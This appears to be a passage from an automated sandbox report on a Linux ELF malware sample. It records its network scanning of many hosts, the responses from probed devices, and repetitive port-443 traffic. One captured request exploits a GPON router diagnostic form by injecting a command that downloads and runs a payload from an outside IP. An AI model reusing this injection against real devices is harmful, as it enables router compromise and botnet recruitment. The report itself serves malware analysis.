              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 213.140.214.44:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 94.104.105.172:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 136.246.75.103:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 190.199.54.229:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 166.71.233.187:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 113.101.154.185:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 54.215.234.85:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 106.254.88.79:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 118.66.113.103:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 97.234.75.136:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 139.236.252.120:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 170.12.134.199:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 71.103.148.215:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 67.197.5.56:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 52.229.81.168:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 51.87.193.161:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 50.113.87.242:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 148.164.114.81:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 96.18.136.130:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 204.185.236.107:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 219.226.130.86:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 112.239.170.135:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 42.51.125.238:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 102.99.213.86:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 92.0.245.48:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 76.76.207.116:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 61.30.4.95:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 209.109.236.160:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 1.73.115.202:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 94.137.103.216:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 115.18.105.247:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 47.180.161.177:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 75.144.194.63:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 204.89.23.14:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 202.246.254.121:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 94.51.213.123:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 80.178.16.5:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 211.214.156.188:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 207.26.30.252:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 85.99.1.149:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 126.188.123.146:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 118.138.77.42:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 165.153.8.243:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 151.204.13.67:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 124.133.54.178:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 217.251.206.53:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 45.136.131.28:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 100.210.146.193:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 75.103.99.223:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 156.115.82.18:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 31.107.180.206:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 191.185.241.218:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 181.11.79.0:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 185.0.206.110:8080
              Source: /tmp/ZhhHfkNewm.elf (PID: 6206) Socket: 127.0.0.1::45837
              Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1
                  User-Agent: Hello, World
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  Content-Type: application/x-www-form-urlencoded
                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Thu, 21 Dec 2023 17:40:54 GMT
                  Server: Webs
                  X-Frame-Options: SAMEORIGIN
                  Cache-Control: no-cache
                  Content-Length: 166
                  Content-Type: text/html
                  Connection: keep-alive
                  Keep-Alive: timeout=60, max=99
                  Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Thu, 21 Dec 2023 17:41:08 GMT
                  Connection: Close
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Fri, 22 Dec 2023 00:31:43 GMT
                  Server: Webs
                  X-Frame-Options: SAMEORIGIN
                  Cache-Control: no-cache
                  Content-Length: 166
                  Content-Type: text/html
                  Connection: keep-alive
                  Keep-Alive: timeout=60, max=99
                  Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Connection: close
                  Transfer-Encoding: chunked
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Server: Chunjs/Server
                  Connection: close
                  Content-Type: text/html
                  Content-Length: 103
                  Data Ascii: <html><body><h2><font color="red">/usr/sbin/web/www/tmUnblock.cgi</font> not found !</h2></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Content-Type: text/plain
                  Content-Length: 30
                  Connection: close
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Connection: close
                  Transfer-Encoding: chunked
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Thu, 21 Dec 2023 17:48:06 GMT
                  Connection: Close
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Content-Type: text/plain
                  Content-Length: 30
                  Connection: close
              Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  CONNECTION: close
                  CONTENT-LENGTH: 48
                  X-XSS-Protection: 1;mode=block
                  Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
                  X-Content-Type-Options: nosniff
                  CONTENT-TYPE: text/html
                  Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Thu, 21 Dec 2023 14:16:17 GMT
                  Server: DNVRS-Webs
                  Cache-Control: no-cache
                  Content-Length: 166
                  Content-Type: text/html
                  Connection: keep-alive
                  Keep-Alive: timeout=60, max=99
                  Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Content-Type: text/plain
                  Content-Length: 30
                  Connection: close
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Cache-Control: public
                  Pragma: cache
                  Expires: Thu, 21 Dec 2023 18:12:19 GMT
                  Date: Thu, 21 Dec 2023 17:42:19 GMT
                  Last-Modified: Thu, 21 Dec 2023 17:42:19 GMT
                  Accept-Ranges: bytes
                  Connection: close
                  Data Ascii: <html><head> <title>404 Not Found</title></head><body bgcolor="ffffff"> <h2>404 Not Found<h2> <p> </body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Thu, 20 Aug 1970 20:46:29 GMT
                  Server: Web Server
                  Connection: close
                  Data Ascii: 404 Not Found
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Connection: close
                  Content-Length: 1686
                  Content-Type: text/html; charset=utf-8
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Server: Microsoft-IIS/8.5
                  X-Powered-By: ASP.NET
                  Date: Thu, 21 Dec 2023 17:42:50 GMT
                  Content-Length: 1245
              Source: ZhhHfkNewm.elf String found in binary or memory: http://45.142.182.103/bin
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
              Source: unknownNetwork traffic detected: HTTP traffic on port 44820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40522
              Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40520
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52528
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52526
              Source: unknownNetwork traffic detected: HTTP traffic on port 57276 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52520
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39532
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39534
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52524
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39536
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
              Source: unknownNetwork traffic detected: HTTP traffic on port 58590 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52522
              Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40516
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39526
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40514
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40518
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40512
              Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40510
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
              Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52530
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
              Source: unknownNetwork traffic detected: HTTP traffic on port 47474 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39520
              Source: unknownNetwork traffic detected: HTTP traffic on port 45268 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
              Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39522
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52532
              Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57252 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39516
              Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
              Source: unknownNetwork traffic detected: HTTP traffic on port 53766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39518
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40502
              Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
              Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
              Source: unknownNetwork traffic detected: HTTP traffic on port 43988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40506
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
              Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40500
              Source: unknownNetwork traffic detected: HTTP traffic on port 46594 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52548
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
              Source: unknownNetwork traffic detected: HTTP traffic on port 39816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52542
              Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52540
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39514
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52544
              Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39504
              Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
              Source: unknownNetwork traffic detected: HTTP traffic on port 36780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39508
              Source: unknownNetwork traffic detected: HTTP traffic on port 35466 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57288 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40570
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39580
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39582
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39584
              Source: unknownNetwork traffic detected: HTTP traffic on port 55502 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49618 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
              Source: unknownNetwork traffic detected: HTTP traffic on port 46582 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39588
              Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40568
              Source: unknownNetwork traffic detected: HTTP traffic on port 38106 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40562
              Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47486 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40566
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40564
              Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39570
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39572
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39574
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
              Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39578
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
              Source: unknownNetwork traffic detected: HTTP traffic on port 35082 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
              Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40556
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40554
              Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35094 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
              Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39560
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39562
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39564
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
              Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39566
              Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39568
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
              Source: unknownNetwork traffic detected: HTTP traffic on port 39828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40546
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
              Source: unknownNetwork traffic detected: HTTP traffic on port 45712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
              Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40544
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
              Source: unknownNetwork traffic detected: HTTP traffic on port 49606 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40542
              Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52506
              Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
              Source: unknownNetwork traffic detected: HTTP traffic on port 38118 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52504
              Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39550
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52508
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39552
              Source: unknownNetwork traffic detected: HTTP traffic on port 33704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39554
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
              Source: unknownNetwork traffic detected: HTTP traffic on port 47498 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39558
              Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52500
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39548
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40530
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
              Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
              Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45256 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40534
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
              Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
              Source: unknownNetwork traffic detected: HTTP traffic on port 40036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40492
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
              Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40490
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52476
              Source: unknownNetwork traffic detected: HTTP traffic on port 44376 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52474
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
              Source: unknownNetwork traffic detected: HTTP traffic on port 59878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52478
              Source: unknownNetwork traffic detected: HTTP traffic on port 56864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52482
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52480
              Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40486
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40484
              Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40480
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39494
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52486
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39496
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
              Source: unknownNetwork traffic detected: HTTP traffic on port 33236 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52484
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39498
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52490
              Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52492
              Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40472
              Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40478
              Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40476
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39480
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39482
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40470
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
              Source: unknownNetwork traffic detected: HTTP traffic on port 55046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39484
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39486
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52498
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
